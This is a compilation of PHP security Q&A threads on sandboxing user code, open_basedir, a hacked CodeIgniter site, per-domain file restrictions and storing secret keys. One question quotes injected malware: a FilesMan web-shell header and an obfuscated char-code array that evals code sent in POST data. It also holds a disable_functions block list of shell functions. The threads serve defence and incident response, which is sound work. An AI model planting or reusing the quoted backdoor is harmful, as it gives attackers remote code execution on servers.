User Permission in PHP
I'm working on an online platform that lets users write PHP code in a textarea
and see the result of that code in an iframe.
Why? Because I want to release an API for another platform so that users
can try it without problems.
With this platform users can create/edit/delete files.
Every user has a personal folder that contains their own files; the folder's name is the same as the username.
My problem is that I don't want a user to be able to edit other users' files, only their own.
How can I do this?
If a user writes code that refers to another user's folder,
//for example
fopen('../path_to_different_dir');
that user could delete all the files belonging to the other user.
How can I avoid this?
I want ONLY functions written by me to be able to change files; functions created by users should not have permission to change any files.
That way I could control all of this, but I don't know how to implement something like it.
If I understand you correctly, you are building an "online" PHP compiler.
Well, you have bigger concerns than just relative paths.
The best approach will be to use a PHP sandbox class that enables you to block unsafe code.
Here is a nice project (the best I know of): a full-scale PHP 5.3.2+ sandbox class that utilizes PHP-Parser to prevent sandboxed code from running unsafe code.
Doing it like that, you can whitelist the functions you want and blacklist the others - this way you can leave out exec, shell_exec, and so on.
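Independently of a sandbox class, PHP's own disable_functions directive in php.ini can blacklist dangerous functions for the whole installation. This is a global, coarse-grained setting (a sandbox is still needed for per-user control); the list below is just an illustrative starting point:

```ini
; php.ini - disable shell-related functions install-wide.
; A sandbox class is still needed for fine-grained, per-user control.
disable_functions = exec,shell_exec,system,passthru,proc_open,popen
```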
For the relative path issue you can always create a virtual host for the user's folder when the folder is created, and box the user in with open_basedir:
<VirtualHost 178.154.120.143:80>
<Directory /httpdocs/user/userfolder>
php_admin_value open_basedir "/httpdocs/user/userfolder"
</Directory>
</VirtualHost>
The problem here is that you will need to flush the changes, which normally requires a server restart. But there are solutions for that too:
configure virtualhost without restarting apache web server
I hope it helps.
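In application code, the relative-path problem can also be mitigated by resolving every user-supplied path and verifying that it stays inside the user's own folder. A minimal sketch, where resolve_user_path() is a hypothetical helper (not part of any API mentioned above) and the base directory must be adapted to your layout:

```php
<?php
// Sketch: confine every user-supplied path to that user's own folder.
// resolve_user_path() is a made-up helper name for this illustration.
function resolve_user_path(string $baseDir, string $userPath): ?string
{
    // Candidate path inside the user's folder.
    $candidate = $baseDir . '/' . $userPath;

    // realpath() collapses "../" sequences and symlinks; it returns
    // false if the target does not exist.
    $resolvedBase = realpath($baseDir);
    $resolved     = realpath($candidate);

    if ($resolvedBase === false || $resolved === false) {
        return null; // base missing or target does not exist
    }

    // Accept the path only if it is still inside the user's folder.
    if (strpos($resolved, $resolvedBase . DIRECTORY_SEPARATOR) !== 0
        && $resolved !== $resolvedBase) {
        return null; // escaped via "../" or a symlink
    }
    return $resolved;
}
```

Your own file functions would then call this helper first and refuse any path that comes back null, which blocks the `../` example from the question.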
Related
Codeigniter application getting hacked, code injected in index.php
I have a CodeIgniter 2.0.2 project that keeps getting hacked. There are two main issues:

Malicious code is being added to the start of the index.php file
Rogue files are added to the server

According to the host there are no FTP logs to indicate these files were uploaded. As there are no FTP upload logs related to the rogue files, does this mean it must be an exploit via the site itself, e.g. a contact or upload form? The site is on shared hosting - could it be that a site on the same server is also getting hacked and this is causing the problems? Would it help if I changed the filename of index.php to something else? As index.php is getting modified, should I CHMOD it to 644? I've been looking for the suggested permissions for CodeIgniter projects but haven't found any yet. I was thinking 644 across the site apart from the upload/logs directories (777) - does this sound okay?

Code injected at the top of the index.php file:

<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-

which is then followed by a long preg_replace statement with a long encoded string.
This is followed by a second statement: if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);} There is a contact form and a form where a user can upload items using CKFinder 2.0.1. Going to update this and see if that resolves it.
There's a couple of things you can do:

Check your logfiles for POST requests to files with weird or unfamiliar names, e.g. .cache_123.php - these could be backdoor scripts, especially filenames starting with a dot, which hides them from the (regular) filesystem.
Download the complete live site and do a site-wide search for things such as base64_decode, exec, preg_replace, passthru, system, shell_exec, eval, FilesMan.
Have your entire (downloaded live) site checked by running it through anti-virus software (AVG, Avast, ...).
Chmod upload directories 775 instead of 777 if possible.
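The site-wide search suggested above can be scripted. A rough sketch in PHP, run against a downloaded copy of the site; the marker list mirrors the answer and a hit is only a lead to inspect, not proof of compromise:

```php
<?php
// Sketch: scan a local copy of the site for suspicious markers.
// Purely illustrative; legitimate code also uses some of these names.
function scan_for_markers(string $dir, array $markers): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $code = file_get_contents($file->getPathname());
        foreach ($markers as $marker) {
            if (stripos($code, $marker) !== false) {
                $hits[$file->getPathname()][] = $marker;
            }
        }
    }
    return $hits;
}

// Markers taken from the answer above; extend as needed.
$markers = ['base64_decode', 'preg_replace', 'passthru', 'shell_exec',
            'eval(', 'FilesMan'];
```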
I know this is an old thread, but I'd like to add an option to figure out what and where the problem is occurring. Create a hook which loads each time (it doesn't matter at which stage) and dump $this->input->post() and ->get() to a log file together with the class name and method name. This way you will see quickly enough where the problem started.
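A rough sketch of that hook, assuming CodeIgniter 2.x; the RequestLogger class name and the log format are made up for this example:

```php
<?php
// application/config/hooks.php - register a hook that runs once the
// controller is constructed (CodeIgniter 2.x style; adapt paths):
//
// $hook['post_controller_constructor'] = array(
//     'class'    => 'RequestLogger',     // hypothetical class name
//     'function' => 'log_request',
//     'filename' => 'RequestLogger.php',
//     'filepath' => 'hooks',
// );

// The hook body boils down to formatting one log line per request;
// shown as a plain function so it can also run outside the framework.
function format_request_log(string $class, string $method,
                            array $post, array $get): string
{
    return sprintf('[%s::%s] POST=%s GET=%s',
        $class, $method, json_encode($post), json_encode($get));
}
```

Inside the hook you would call this with the router's class/method and append the line to a log file outside the webroot.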
I think it is far easier to hack through a PHP app than through an FTP server. Do you have any upload forms? If you can't go with a VPS, try asking your host to move the site to another shared server.
I think you really need to perform a code audit to find where the core vulnerability lies. Unless you run some sort of integrity checks, you can't be sure the attacker hasn't put backdoors in other files. As a quick fix, I would suggest installing the ModSecurity Apache module if possible. Next, look for places in the code where file injection could occur (usually file upload functions).
How to Restrict PHP's File Access to DOCUMENT_ROOT
Is it possible to restrict PHP's file access to its document root? Basically, on my work's server we have our domains in a file structure like:

/home/something/domains/domain1/
/home/something/domains/domain2/
/home/something/domains/domain3/

Right now, any script on domain1 has read and write access to anything in /home/something/domains/, including all of our other domains. I would like to restrict file access for a script in domain1 to only that domain. The server is hosted with mediatemple on their grid service, so I don't have root access or even vhost config access. We can change php.ini, and I know it offers open_basedir, but that doesn't sound like it solves my problem, as I could only restrict file access to /domains/ and not the individual domains. Any help appreciated.

What I'm really trying to do: this server was recently hacked, and the hackers were overwriting domains/.htaccess, which affected all our sites. We have tons of sites and many of them have lots of lines of bad code. They uploaded WSO, a hacking backdoor/shell which gave them full access to everything. I don't know how they got access; I guess it was either the timthumb exploit, one of the millions of lines of bad code, or they just got our FTP password somehow. We updated old timthumbs, changed the password and removed all the bad files we found, but since there is a decent chance whatever exploit they found is still on the server, or that we missed some backdoor, I would at least like to limit their access to the actual domain that contains the exploit or unfound backdoor.
My initial thought was to set open_basedir for each of the virtual hosts (even if you have to ask your host admin to do it for you), but I am doubtful that will even work, because I am fairly certain external/shell commands run from PHP scripts will still operate on directories outside of the designated tree. After more consideration, the closest way to configure your setup and get what you want, that I could think of, would be to set up chroot-jailed user accounts for each vhost and have your webserver use those user accounts through a mechanism like the Apache 2 MPM ITK - which I can only assume your hosting provider will have trouble setting up.
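Since the question says php.ini can be changed but vhost configs cannot, it may be worth noting that PHP (5.3+, CGI/FastCGI only) supports per-directory [PATH=...] sections in php.ini, which could scope open_basedir to each domain without touching the vhost config. The same caveat about shell commands applies; the paths below follow the layout from the question:

```ini
; php.ini - per-directory sections (CGI/FastCGI SAPIs only, PHP 5.3+).
[PATH=/home/something/domains/domain1]
open_basedir = /home/something/domains/domain1

[PATH=/home/something/domains/domain2]
open_basedir = /home/something/domains/domain2
```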
PHP application to replicate websites from single code source
I'm attempting to build an application in PHP to help me configure new websites. New sites will always be based on a specific "codebase" containing all the necessary web files. I want my PHP script to copy those web files from one domain's webspace to another domain's webspace: when I click a button, an empty webspace is populated with files from another domain. Both domains are on the same Linux/Apache server. But I'm running into permission/ownership issues when copying across domains. As an experiment, I tried using shell and exec commands in PHP to perform actions as "root". (I know this can open major security holes, so it's not my ideal method.) But I still had similar permission issues and couldn't get that method to work either. Maybe a CGI script is a better idea, but I'm not sure how to approach it. Any advice is appreciated. Or, if you know of a better resource for this type of information, please point me toward it. I'm sure this sort of "website setup" application has been built before. Thanks!
I'm also doing something like this. The only difference is that I'm not making copies of the core files: the system has one core, and only specific files are copied. If you want to copy files, you have to take the following into consideration:

An easy (less secure) way is to use the same user for all websites. Otherwise (in case you want to provide different accesses) you must create a different owner for each website, and you must set the owner/group for the copied files (this has to be done by root).
For the new website setup: either the main domain runs as root, and then it can execute the creation of a new website, or, if you don't want your main domain to be root, create a cronjob (or a PHP script that runs in a loop under the CLI) that is executed by root. It checks some database record every 2 minutes, for example, and from your main domain you add a record with the setup info for the new hosted website (or just execute some script that gains root access and does it without cron).
The script that does this can be written in PHP; it can be done in any language you wish, it doesn't really matter as long as it gets the correct access.

In my case I'm using the same user since they are all my websites. The disadvantage is that the OS won't create restrictions; my PHP code will (I'm losing the advantage of user/group permissions between different websites). Notice that open_basedir can cause you some hassle - make sure you exclude the correct paths (or disable it). Also, there are some minor differences between FastCGI and suPHP (I believe they won't cause you too much trouble).
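A minimal sketch of the copy step itself, under the assumptions above; copy_site() is a made-up name, and the chown step only succeeds when the script runs as root (e.g. from the cron/CLI approach described):

```php
<?php
// Sketch: recursively copy a codebase into a new webspace.
// copy_site() is a hypothetical helper name for this illustration.
function copy_site(string $src, string $dst): void
{
    if (!is_dir($dst)) {
        mkdir($dst, 0755, true);
    }
    foreach (scandir($src) as $entry) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $from = $src . '/' . $entry;
        $to   = $dst . '/' . $entry;
        if (is_dir($from)) {
            copy_site($from, $to);   // recurse into subdirectories
        } else {
            copy($from, $to);
        }
    }
}

// When run as root, ownership would then be handed to the new site's
// user, e.g. by walking the tree and calling chown()/chgrp() on each
// file (user/group names here are placeholders):
// chown($dst, 'newsiteuser'); chgrp($dst, 'newsitegroup');
```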
deny access to certain folder using php
Is it possible to "deny from all" apache htaccess style using php. I can't use htaccess because im using different webserver, so i wan't to use php to workaround it. So let say user are trying to access folder name 'david', all content and subdirectory are denied from viewing.
No, PHP cannot be used to protect folders, because it is not PHP that serves requests, but the web server. You can move this directory above the Document Root to prevent web access to it. But permissions will help you nothing.
Use chmod to change the permissions on that directory. Note that the user running PHP needs to own it in that case.
If you just want to prevent indexing of the folder, you can create an index.php file that does a simple redirect. Note: requests for a valid filename will still be let through.
<?php header("Location: /"); // redirect the user to the root directory
Without cooperation from the webserver, the only way to protect your files is to encrypt them - in an archive, maybe, of which your script would know the password and tell no one. That will end up wasting CPU, as the server will be decrypting all the time. Alternatively, use an incredibly deranged file naming scheme, one you won't ever describe to anyone, and that only your PHP script can sort through. Still, data could be downloaded, bandwidth go to waste, and encrypted files decrypted. It all depends on how much that data matters, and how much your time costs, as these convoluted layers of somewhat penetrable obfuscation will likely eat huge chunks of developer time.

Now, as I said, that would be without cooperation from the webserver... but what if the webserver is cooperating and doesn't know? I've seen some Apache webservers (can anyone confirm it's in the standard distribution?) come preloaded with a rule denying access to files starting with .ht: not only .htaccess but everything similar - .htproxy, .htcache, .htwhatever_comes_to_mind, .htyourmama... Chances are your server could be one of those. If that's the case, rename your hidden files .hthidden-<filename1>, .hthidden-<filename2>... and you'll get access to them only through PHP file functions, like readfile().
Storing important secret keys in php files
We're making an app using PHP and some third-party services that require a secret API key. We have a PHP file that contains all those key definitions, which we then import (using require_once) when needed. Is this approach safe? Should we store the keys in a different place? Thank you.
Something similar was asked today for a shell script. The answer is valid here as well: Make sure you store the file outside the web root, or (if that's not possible) protect it using a .htaccess file. I also like to unset() any variables containing sensitive data after use, so not even a full variable dump (e.g. in a debug message) later in that script could reveal it.
It should be relatively safe as long as the file is not accessible from the web. A lot of sites will place sensitive files outside of the webroot on the server, and simply include them when needed into their app.
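The outside-the-webroot pattern can be as simple as a PHP file that returns the keys as an array, required where needed. A sketch combining that with the unset() advice above; the path and key names are placeholders:

```php
<?php
// /etc/myapp/keys.php - stored OUTSIDE the document root. Path and
// key names below are placeholders for this sketch. The file contains:
//
// return [
//     'payment_api_key' => 'live_xxx',
//     'mail_api_key'    => 'key_yyy',
// ];

// In application code:
function load_keys(string $path): array
{
    $keys = require $path;           // the keys file returns an array
    return is_array($keys) ? $keys : [];
}

// Usage: fetch, use, then unset so a later variable dump (e.g. in a
// debug message) cannot reveal the secrets:
// $keys = load_keys('/etc/myapp/keys.php');
// ... call the third-party service ...
// unset($keys);
```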
I always set the permissions of certificates and other files containing sensitive data such that only my development team and the Apache service can access the file. This is important if you are using a server shared by a large organization, like a university, where lots of people might have permissions to the file by default. Often I've seen read permissions given to everyone so that the web server can access the file (since it is neither the owner nor in the group permission for the file, the only thing left is to give read to "other").

Instead, I ensure there is a group containing only my development team, and set the read/write permissions for the file to that group. I then use an ACL to add a read permission for the Apache service. You have to use an ACL, since the owner and group are normally set to a developer and the development team's group, leaving you no options for setting access for Apache other than using an ACL.
Security by obfuscation:

create your own namespace with functions to encode/decode the key
add an auto_prepend_file in php.ini pointing to /usr/share/nginx/outsidehtml/keystorage/83738489384828838227.php
run nginx or apache in a chroot / under SELinux
disable the listing permission on the keystorage folder: setfacl -m user:nginx:x /usr/share/nginx/outsidehtml/keystorage/
in php.ini: disable_classes = ReflectionFunction and disable_functions = opcache_get_status,phpinfo,show_source,ini_get

For better hardening you can store the key in php.ini as a value, i.e. 123key = secret64

TEST: print_r(glob('/usr/share/nginx/outsidehtml/keystorage/*.*'));